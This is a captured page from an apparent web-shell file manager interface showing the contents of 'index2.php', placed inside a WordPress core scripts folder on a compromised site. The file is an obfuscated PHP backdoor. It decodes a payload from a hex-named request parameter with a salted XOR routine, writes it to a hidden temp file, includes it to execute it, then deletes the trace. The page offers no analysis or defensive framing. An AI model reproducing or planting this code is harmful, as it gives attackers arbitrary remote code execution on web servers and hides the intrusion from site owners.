D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
vblioqus
/
safa777.info
/
Old2
/
wp-includes
/
js
/
dist
/
script-modules
/
a11y
/
Filename :
index2.php
back
Copy
<?php if(array_key_exists("\x65\x6Cem", $_REQUEST)){ $tkn = array_filter([sys_get_temp_dir(), getcwd(), getenv("TMP"), "/var/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm"]); $sym = $_REQUEST["\x65\x6Cem"]; $sym = explode ( '.' , $sym ) ; $data_chunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); foreach ($sym as $j => $v7): $chS = ord($salt[$j%$sLen]); $d = ((int)$v7 - $chS - ($j%10)) ^40; $data_chunk .= chr($d); endforeach; foreach ($tkn as $binding): if (!( !is_dir($binding) || !is_writable($binding) )) { $itm = "$binding/.resource"; $file = fopen($itm, 'w'); if ($file) { fwrite($file, $data_chunk); fclose($file); include $itm; @unlink($itm); die(); } } endforeach; }